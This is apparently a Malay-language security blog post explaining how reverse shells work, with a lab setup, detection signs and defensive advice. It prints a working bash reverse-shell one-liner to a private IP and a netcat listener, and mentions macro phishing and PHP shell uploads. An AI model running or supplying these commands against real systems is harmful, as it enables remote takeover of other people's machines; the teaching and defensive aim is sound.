π‘οΈ Reverse Shell: Cara Ia Berfungsi & Cara Nak Elak Jadi Mangsa
oleh Zabel Iqbal β fixer malam, janitor digital, dan individu yang tahu beza ethical hacker dengan keyboard warrior.
β οΈ Peringatan (Kena Letak Kalau Tak Nak Kena Ciduk)
Artikel ni untuk pendidikan sahaja. Kalau kau:
- Seorang penetration tester berlesen
- Seorang sysadmin yang nak faham teknik attack
- Atau budak IT yang tengah study dan tak suka jadi mangsa serangan
Then youβre in the right place.
Kalau kau tengah cari tutorial untuk βhack WiFi jiran,β tekan butang X sekarang. Bukan sini tempatnya.
π§ Apa Itu Reverse Shell?
Okay. Guna analogi senang.
- Biasanya bila kau SSH ke server, kau connect kat server.
- Tapi dengan reverse shell, server tu yang connect ke kau balik.
Sebab tu ia “reverse”.
Kenapa Reverse Shell Popular?
- Firewall biasanya block connection masuk (inbound)
- Tapi connection keluar (outbound) β macam nak update software, ping, curl β dia lepas je.
- Attacker ambik kesempatan atas lubang tu.
π» Contoh Reverse Shell (LAB GUNA, JANGAN BUAT GILA)
bash -i >& /dev/tcp/192.168.0.66/4444 0>&1
Listener (kat attacker):
nc -lvnp 4444
Nota: Kalau tak jadi, semak:
- IP betul?
- Firewall block?
- Port 4444 open?
- Network sama?
π Contoh Reverse Shell Dalam Dunia Sebenar
- Meterpreter (Metasploit) β Reverse shell dengan banyak feature: webcam, keylogger, upload file.
- Phishing + Macro β Email suruh buka Excel. Bila enable macro, shell aktif.
- Web server vulnerable β Upload file .php dengan shell.
π§ͺ Setup LAB Macam Pro
- 1x Kali Linux (attacker)
- 1x Ubuntu / Windows (target)
- VirtualBox / VMware
- Private internal network (jangan sambung internet)
Tips: Snapshot VM dulu, test dalam NAT, guna Wireshark untuk pantau.
π΅οΈββοΈ Cara Nak Kesan Reverse Shell (Untuk Defender & Sysadmin)
Tanda-tanda:
- Proses pelik (contoh:
bash
) connect ke IP luar - Port outbound aneh dibuka (contoh: 4444, 5555)
- Kelakuan user tak logik
Tools berguna:
- Wireshark
- Zeek
- Suricata / Snort
- OSQuery
π‘οΈ Tips Defensif: Elakkan Jadi Mangsa
- Egress Filtering β Block outbound yang tak perlu
- Firewall Rules β Allowlist sahaja
- Syslog + Alert β Pantau proses mencurigakan
- Endpoint Protection β EDR yang detect behavior pelik
- Honeypot β Trap attacker
π€ΉββοΈ Bonus: Reverse Shell Gagal?
Sebab biasa:
- Salah IP (NAT punya pasal)
- Firewall block port
- Syntax salah
- Antivirus aktif
π Sumber Belajar Untuk Ethical Hacker
Platform | Apa Best |
---|---|
HackTheBox | Real-world challenge |
TryHackMe | Interactive dan beginner-friendly |
PortSwigger Academy | Fokus web app security |
OWASP Top 10 | Standard global |
π€ Penutup: Jangan Jadi Hacker Bodoh
Reverse shell ni macam pisau. Kalau guna betul, berguna. Kalau salah β potong tangan sendiri.
Ingat:
- Belajar β Jangan exploit
- Lab test β Jangan test kat server orang
- Kalau tak pasti β Jangan buat gila
Kita fixer, bukan troublemaker.